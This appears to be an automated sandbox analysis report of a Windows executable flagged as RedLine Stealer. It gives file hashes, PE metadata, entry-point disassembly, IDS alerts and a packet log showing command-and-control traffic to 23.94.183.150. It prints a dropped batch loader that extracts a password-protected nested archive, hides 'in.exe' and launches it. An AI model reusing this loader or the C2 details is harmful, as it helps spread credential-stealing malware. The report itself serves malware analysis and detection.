                                            SSDEEP:49152:kiDOyrn4cq0kao0r7D3ncd7gyP1KhxljzQA8H2ZBIdqit:SV0no0S/PAVZ+3t
                                            MD5:EA47839FFE04168028932250CCE39DA3
                                            SHA1:5F137402C577C82CA93FFEB8381141E6ABC42D5A
                                            SHA-256:21B777B5BCF3B3C0D1569802F2D68A9B27C91C5EEFA60C3814A0DFB0452D2E75
                                            SHA-512:3D3C8085BC8990D9DB4CE48216ED0CEC9969A19B87EB1603FA62FADF17A1F6F898F8872AFF3ACCE4A5C2290C63D4DB2F03F25314EFD901A6BDDC59CBE474B0FB
                                            Malicious:false
                                            Preview:PK...........Xv2..!."...".....file_4.zip.(`..xs....h...=pS..9..[B.....3..`2w.......-9.mH...DK.{..E.?.-.kJ.] -..zX6.....j.$......%0d...M.f.R...U.'z.@.\......5.....jW...U......jZ.*........ ...WA....0:ip-/s.4..w...;.......M...gD.c*..].[h=..d~4*wR.]d.....%.G"].CR..........$.Z.w.......:.......h..TI1.U..?....f7\.~...c_g.UM...I@|....[#$.Hl...?z...c...j...t.....?.1/...$..(.B:......F..V....].l.>......k..h.....U.X.V...Z..`.b..H9.ub..c..i...(zEsnR~*+..>..VbxK..m...T.B...t...=B.....................|..K. ..J..m}........,g....m.$O~/.^..j..0..k'!fu.P.0.9.x.v.s...%...SW.q.0u.j;...T..%.W.b.?...[^.?...f.W_!SZ...T...B...9SJ.3M..:*.q.E9...[.$og....V.Um0....=tu...Mn^.xR&...>..t.;JRv..5e.~. }.v...<. ...G.*..^....u.~[..?.J...Ok..!l.J....V.K..6.%t"N.......O..wl$..jn8,..B.p....y.W.31.Z5.\...;..]_H......R....2)...(.j.....+..k.r../oiuf...].;\l............!K.....\[p....L..2x...w...H.FDH9.5gE.d.6kL..R...i..xq..?.\...td)B~.<{{..H.Gk'.._..i...u0....b.I.#{2..9y..w....:..F
                                            Process:C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe
                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                            Category:dropped
                                            Size (bytes):438
                                            Entropy (8bit):5.059136584355333
                                            Encrypted:false
                                            SSDEEP:12:QUp+CF16g64CTFMj2LIQLvcQW+CVGrMLvmuCogLKO8NerxVv:QUpNF16g632Cke5W+CVGYTOLv8k7
                                            MD5:0CF3F0045A205024F27D5FA77133721A
                                            SHA1:4EE588B176338AD2B98C69FDB8CE69E8E1D3A8F7
                                            SHA-256:246FF46EC2663A262A37B80769C7E67037A730CF8E7B9065FABAD54EE957CE96
                                            SHA-512:2C957F678EA006D29828D4F2704D19A2EEC5A0B5F23855632917F4ABE39D67B29566586688E8B6447DF548F0BDAF828E84BB9895C907276AD78E0EEB812D65F6
                                            Malicious:false
                                            Preview:..&cls..@echo off..mode 65,10..title g3g34g34g34g43 (34g34g45h6hj56j56j)..md extracted..ren file.bin file.zip..call 7z.exe e file.zip -p324051139125346723019431074 -oextracted ..for /l %%i in (4,-1,1) do (..call 7z.exe e extracted/file_%%i.zip -oextracted..)..ren file.zip file.bin..cd extracted..move "in.exe" ../..cd....rd /s /q extracted..attrib +H "in.exe"..start "" "in.exe"..cls..echo Launched 'in.exe'...pause..del /f /q "in.exe"..
                                            Process:C:\Users\user\AppData\Local\Temp\main\in.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):2251
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3::
                                            MD5:0158FE9CEAD91D1B027B795984737614
                                            SHA1:B41A11F909A7BDF1115088790A5680AC4E23031B
                                            SHA-256:513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
                                            SHA-512:C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
                                            Malicious:false
                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                            File Type:ASCII text, with CRLF, CR line terminators
                                            Category:dropped
                                            Size (bytes):345
                                            Entropy (8bit):5.042296293911112
                                            Encrypted:false
                                            SSDEEP:6:AMMyS3pt+uoQcAxXF2SaioB1h3DVSTgqF1AivwtHgNxQFfpap1tNTQbdv:pMpDh5RwXzh3DoTgqFyYwMQJA1tNTQZv
                                            MD5:4FEC417468B84FB3281DE855B785F7FC
                                            SHA1:F5B0B89427DD68540071719DB993E80BCAD2C5AB
                                            SHA-256:00B70526BA4DF5A40CF8EF0CDD756534B6359684761D22D486D129D69DC1AEF5
                                            SHA-512:89277FF743E35F8E07F4539A2D48ABFF45D69E310ED25683C726EACD6266AA013DBA74407EF5955AB39EE6EC01EEE43385941564928C097DE38524DC94AAB4C3
                                            Malicious:false
                                            Preview:..7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21....Scanning the drive for archives:.. 0M Scan. .1 file, 609442 bytes (596 KiB)....Extracting archive: extracted\file_1.zip..--..Path = extracted\file_1.zip..Type = zip..Physical Size = 609442.... 0%. .Everything is Ok....Size: 912896..Compressed: 609442..
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):7.99111373611351
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:jjjUC5ggb2nQMb1B6SvBkwmT.exe
                                            File size:3'221'440 bytes
                                            MD5:9795b9f24e9a98ae78f7cad809ed1e2a
                                            SHA1:d92325ce71ae6bd9af9b74b1cc67f81dbb033020
                                            SHA256:a36a4fce0902ebb99f0a8441b024a03c2f1cd66063c59391257f0f96ea9ee5fb
                                            SHA512:ba6245246a94352757930ae6bac791ab2131f628e6c825451f99f049f5fae66eba2b8ddc24e33758fb4c4389b961d5669cd9e794eb3f2482dd658c0c0e8ee813
                                            SSDEEP:98304:K1545JlGEN7XGUCeDFQW+9KcylF94vOoPqK75S+pXz:K1W53HCeDFw6cvOVK75TD
                                            TLSH:CDE533B17BFE68B0F41521BBA888733C12F9FE894B91D0CBD788294A6E446C5617D0D7
                                            File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................b1..............................................0...N..........0.0..?.
                                            Icon Hash:00828e8e8686b000
                                            Entrypoint:0x41945f
                                            Entrypoint Section:.text
                                            Digitally signed:true
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:
                                            Time Stamp:0x4FC33FCE [Mon May 28 09:05:18 2012 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f6baa5eaa8231d4fe8e922a2e6d240ea
                                            Signature Valid:false
                                            Signature Issuer:CN=STATPLUS LE, E=STATPLUS LE, O=STATPLUS LE, L=STATPLUS LE, C=USA
                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                            Error Number:-2146762487
                                            Not Before, Not After
                                            • 09/07/2024 02:00:00 09/07/2026 02:00:00
                                            Subject Chain
                                            • CN=STATPLUS LE, E=STATPLUS LE, O=STATPLUS LE, L=STATPLUS LE, C=USA
                                            Version:3
                                            Thumbprint MD5:F26C74479D5E065AB9ECB2449FFBD5F3
                                            Thumbprint SHA-1:4DEFC48DAFB6E191E010930C9716760AB84CBAE8
                                            Thumbprint SHA-256:F50FAB63239CFF0026021904C833DBDA89D3E6ECF876EED29E206851997437AE
                                            Serial:7049503CAA85048F
                                            Instruction
                                            push ebp
                                            mov ebp, esp
                                            push FFFFFFFFh
                                            push 0041C480h
                                            push 004195F0h
                                            mov eax, dword ptr fs:[00000000h]
                                            push eax
                                            mov dword ptr fs:[00000000h], esp
                                            sub esp, 68h
                                            push ebx
                                            push esi
                                            push edi
                                            mov dword ptr [ebp-18h], esp
                                            xor ebx, ebx
                                            mov dword ptr [ebp-04h], ebx
                                            push 00000002h
                                            call dword ptr [0041A1E0h]
                                            pop ecx
                                            or dword ptr [00422DE4h], FFFFFFFFh
                                            or dword ptr [00422DE8h], FFFFFFFFh
                                            call dword ptr [0041A1E4h]
                                            mov ecx, dword ptr [00420DCCh]
                                            mov dword ptr [eax], ecx
                                            call dword ptr [0041A1E8h]
                                            mov ecx, dword ptr [00420DC8h]
                                            mov dword ptr [eax], ecx
                                            mov eax, dword ptr [0041A1ECh]
                                            mov eax, dword ptr [eax]
                                            mov dword ptr [00422DE0h], eax
                                            call 00007F01247EAB42h
                                            cmp dword ptr [0041E950h], ebx
                                            jne 00007F01247EAA2Eh
                                            push 004195E8h
                                            call dword ptr [0041A1F0h]
                                            pop ecx
                                            call 00007F01247EAB14h
                                            push 0041E070h
                                            push 0041E06Ch
                                            call 00007F01247EAAFFh
                                            mov eax, dword ptr [00420DC4h]
                                            mov dword ptr [ebp-6Ch], eax
                                            lea eax, dword ptr [ebp-6Ch]
                                            push eax
                                            push dword ptr [00420DC0h]
                                            lea eax, dword ptr [ebp-64h]
                                            push eax
                                            lea eax, dword ptr [ebp-70h]
                                            push eax
                                            lea eax, dword ptr [ebp-60h]
                                            push eax
                                            call dword ptr [0041A1F8h]
                                            push 0041E068h
                                            push 0041E000h
                                            call 00007F01247EAACCh
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x1c9840xc8.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x230000x4ed4.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x30e8300x3f90
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x1a0000x36c.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x18e0e0x1900024c0ee59c5c5acd38d95e55352758dd8False0.602919921875data6.656009688780664IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0x1a0000x3bda0x3c00d084871adc0cd9263e4a1811b8fc40faFalse0.45553385416666664data5.725242374702596IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0x1e0000x4dec0xa008c42b68006a121b1b9ebd199e2e59ca5False0.50546875data4.442014356812219IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0x230000x4ed40x50006e7c2212fbc8ea0e907aa402632ee8bfFalse0.1data3.939503749750167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0x231c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088RussianRussia0.0975177304964539
                                            RT_ICON0x236280x9b8Device independent bitmap graphic, 24 x 48 x 32, image size 2448RussianRussia0.10008038585209003
                                            RT_ICON0x23fe00x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352RussianRussia0.061930783242258654
                                            RT_ICON0x251080x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792RussianRussia0.04017493897477624
                                            RT_GROUP_ICON0x277700x3edataRussianRussia0.8387096774193549
                                            RT_VERSION0x277b00x3dcdata0.46558704453441296
                                            RT_MANIFEST0x27b8c0x346ASCII text, with CRLF line terminatorsEnglishUnited States0.5071599045346062
                                            DLLImport
                                            COMCTL32.dll
                                            SHELL32.dllSHGetSpecialFolderPathW, ShellExecuteW, SHGetMalloc, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteExW
                                            GDI32.dllCreateCompatibleDC, CreateFontIndirectW, DeleteObject, DeleteDC, GetCurrentObject, StretchBlt, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, GetObjectW
                                            ADVAPI32.dllFreeSid, AllocateAndInitializeSid, CheckTokenMembership
                                            USER32.dllGetWindowLongW, GetMenu, SetWindowPos, GetWindowDC, ReleaseDC, GetDlgItem, GetParent, GetWindowRect, GetClassNameA, CreateWindowExW, SetTimer, GetMessageW, DispatchMessageW, KillTimer, DestroyWindow, SendMessageW, EndDialog, wsprintfW, GetWindowTextW, GetWindowTextLengthW, GetSysColor, wsprintfA, SetWindowTextW, MessageBoxA, ScreenToClient, GetClientRect, SetWindowLongW, UnhookWindowsHookEx, SetFocus, GetSystemMetrics, SystemParametersInfoW, ShowWindow, DrawTextW, GetDC, ClientToScreen, GetWindow, DialogBoxIndirectParamW, DrawIconEx, CallWindowProcW, DefWindowProcW, CallNextHookEx, PtInRect, SetWindowsHookExW, LoadImageW, LoadIconW, MessageBeep, EnableWindow, IsWindow, EnableMenuItem, GetSystemMenu, CreateWindowExA, wvsprintfW, CharUpperW, GetKeyState, CopyImage
                                            ole32.dllCreateStreamOnHGlobal, CoCreateInstance, CoInitialize
                                            OLEAUT32.dllVariantClear, SysFreeString, OleLoadPicture, SysAllocString
                                            KERNEL32.dllGetFileSize, SetFilePointer, ReadFile, WaitForMultipleObjects, GetModuleHandleA, SetFileTime, SetEndOfFile, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, FormatMessageW, lstrcpyW, LocalFree, IsBadReadPtr, GetSystemDirectoryW, GetCurrentThreadId, SuspendThread, TerminateThread, InitializeCriticalSection, ResetEvent, SetEvent, CreateEventW, GetVersionExW, GetModuleFileNameW, GetCurrentProcess, SetProcessWorkingSetSize, SetCurrentDirectoryW, GetDriveTypeW, CreateFileW, GetCommandLineW, GetStartupInfoW, CreateProcessW, CreateJobObjectW, ResumeThread, AssignProcessToJobObject, CreateIoCompletionPort, SetInformationJobObject, GetQueuedCompletionStatus, GetExitCodeProcess, CloseHandle, SetEnvironmentVariableW, GetTempPathW, GetSystemTimeAsFileTime, lstrlenW, CompareFileTime, SetThreadLocale, FindFirstFileW, DeleteFileW, FindNextFileW, FindClose, RemoveDirectoryW, ExpandEnvironmentStringsW, WideCharToMultiByte, VirtualAlloc, GlobalMemoryStatusEx, lstrcmpW, GetEnvironmentVariableW, lstrcmpiW, lstrlenA, GetLocaleInfoW, MultiByteToWideChar, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetSystemDefaultLCID, lstrcmpiA, GlobalAlloc, GlobalFree, MulDiv, FindResourceExA, SizeofResource, LoadResource, LockResource, LoadLibraryA, GetProcAddress, GetModuleHandleW, ExitProcess, lstrcatW, GetDiskFreeSpaceExW, SetFileAttributesW, SetLastError, Sleep, GetExitCodeThread, WaitForSingleObject, CreateThread, GetLastError, SystemTimeToFileTime, GetLocalTime, GetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetStartupInfoA
                                            MSVCRT.dll??3@YAXPAX@Z, ??2@YAPAXI@Z, memcmp, free, memcpy, _wtol, _controlfp, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z, memset, _wcsnicmp, strncmp, wcsncmp, malloc, memmove, _purecall
                                            Language of compilation systemCountry where language is spokenMap
                                            RussianRussia
                                            EnglishUnited States
                                            TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                            2024-07-26T19:26:04.138395+0200TCP2043231ET MALWARE Redline Stealer TCP CnC Activity497065058192.168.2.523.94.183.150
                                            2024-07-26T19:26:06.203650+0200TCP2043231ET MALWARE Redline Stealer TCP CnC Activity497065058192.168.2.523.94.183.150
                                            2024-07-26T19:26:07.970977+0200TCP2043231ET MALWARE Redline Stealer TCP CnC Activity497065058192.168.2.523.94.183.150
                                            2024-07-26T19:26:03.883701+0200TCP2043231ET MALWARE Redline Stealer TCP CnC Activity497065058192.168.2.523.94.183.150
                                            2024-07-26T19:26:07.460720+0200TCP2043231ET MALWARE Redline Stealer TCP CnC Activity497065058192.168.2.523.94.183.150
                                            2024-07-26T19:26:07.587021+0200TCP2043231ET MALWARE Redline Stealer TCP CnC Activity497065058192.168.2.523.94.183.150
                                            2024-07-26T19:26:07.825893+0200TCP2043231ET MALWARE Redline Stealer TCP CnC Activity497065058192.168.2.523.94.183.150
                                            2024-07-26T19:26:05.217520+0200TCP2043231ET MALWARE Redline Stealer TCP CnC Activity497065058192.168.2.523.94.183.150
                                            2024-07-26T19:26:06.325866+0200TCP2043231ET MALWARE Redline Stealer TCP CnC Activity497065058192.168.2.523.94.183.150
                                            2024-07-26T19:26:05.095680+0200TCP2043231ET MALWARE Redline Stealer TCP CnC Activity497065058192.168.2.523.94.183.150
                                            2024-07-26T19:26:07.338019+0200TCP2043231ET MALWARE Redline Stealer TCP CnC Activity497065058192.168.2.523.94.183.150
                                            2024-07-26T19:26:05.550691+0200TCP2043231ET MALWARE Redline Stealer TCP CnC Activity497065058192.168.2.523.94.183.150
                                            2024-07-26T19:26:04.344095+0200TCP2043231ET MALWARE Redline Stealer TCP CnC Activity497065058192.168.2.523.94.183.150
                                            2024-07-26T19:26:06.792190+0200TCP2043231ET MALWARE Redline Stealer TCP CnC Activity497065058192.168.2.523.94.183.150
                                            2024-07-26T19:25:58.453702+0200TCP2046045ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)497065058192.168.2.523.94.183.150
                                            2024-07-26T19:26:04.968474+0200TCP2043231ET MALWARE Redline Stealer TCP CnC Activity497065058192.168.2.523.94.183.150
                                            2024-07-26T19:26:05.420008+0200TCP2043231ET MALWARE Redline Stealer TCP CnC Activity497065058192.168.2.523.94.183.150
                                            2024-07-26T19:26:05.710903+0200TCP2043231ET MALWARE Redline Stealer TCP CnC Activity497065058192.168.2.523.94.183.150
                                            2024-07-26T19:26:04.350286+0200TCP2043231ET MALWARE Redline Stealer TCP CnC Activity497065058192.168.2.523.94.183.150
                                            2024-07-26T19:25:58.572801+0200TCP2043234ET MALWARE Redline Stealer TCP CnC - Id1Response50584970623.94.183.150192.168.2.5
                                            2024-07-26T19:26:03.753284+0200TCP2046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)50584970623.94.183.150192.168.2.5
                                            2024-07-26T19:26:04.010813+0200TCP2043231ET MALWARE Redline Stealer TCP CnC Activity497065058192.168.2.523.94.183.150
                                            2024-07-26T19:26:50.503417+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971440.68.123.157192.168.2.5
                                            2024-07-26T19:26:06.446924+0200TCP2043231ET MALWARE Redline Stealer TCP CnC Activity497065058192.168.2.523.94.183.150
                                            2024-07-26T19:26:05.878741+0200TCP2043231ET MALWARE Redline Stealer TCP CnC Activity497065058192.168.2.523.94.183.150
                                            2024-07-26T19:26:06.616210+0200TCP2043231ET MALWARE Redline Stealer TCP CnC Activity497065058192.168.2.523.94.183.150
                                            2024-07-26T19:26:03.624089+0200TCP2043231ET MALWARE Redline Stealer TCP CnC Activity497065058192.168.2.523.94.183.150
                                            2024-07-26T19:26:07.706698+0200TCP2043231ET MALWARE Redline Stealer TCP CnC Activity497065058192.168.2.523.94.183.150
                                            2024-07-26T19:26:12.288163+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434970740.68.123.157192.168.2.5
                                            TimestampSource PortDest PortSource IPDest IP
                                            Jul 26, 2024 19:25:57.898174047 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:25:57.903064966 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:25:57.903136015 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:25:57.947212934 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:25:57.952023029 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:25:58.418492079 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:25:58.453701973 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:25:58.458728075 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:25:58.572801113 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:25:58.620345116 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:03.624089003 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:03.629199028 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:03.750307083 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:03.750354052 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:03.750389099 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:03.750420094 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:03.753283978 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:03.753381014 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:03.753515959 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:03.883701086 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:03.889085054 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.003895998 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.010812998 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.016259909 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.129604101 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.138395071 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.143798113 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.143806934 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.143810034 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.143816948 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.143929005 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.143937111 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.143944025 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.144360065 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.270029068 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.323659897 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.344094992 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.350091934 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.350128889 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.350155115 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.350181103 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.350286007 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.350709915 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.350748062 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.350799084 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.350915909 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.351021051 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.351114988 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.355232000 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.355334044 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.355792046 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.355859041 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.356007099 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.356081009 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.356605053 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.356632948 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.356671095 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.356714010 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.356791019 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.356842995 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.356870890 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.356893063 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.356918097 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.356944084 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.356961966 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.356987953 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.356990099 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.357012033 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.357019901 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.357048035 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.357048035 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.357070923 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.357095003 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.357129097 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.357189894 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.357247114 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.357274055 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.357297897 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.357322931 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.357371092 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.357429981 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.360292912 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.360410929 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.361238956 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.361310959 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.361337900 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.361365080 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.361481905 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.361599922 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.361656904 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.362086058 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.362133026 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.362159014 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.362184048 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.362190008 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.362236023 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.362248898 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.362262964 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.362289906 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.362293959 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.362317085 CEST50584970623.94.183.150192.168.2.5
                                            Jul 26, 2024 19:26:04.362335920 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.362366915 CEST497065058192.168.2.523.94.183.150
                                            Jul 26, 2024 19:26:04.362649918 CEST50584970623.94.183.150192.168.2.5
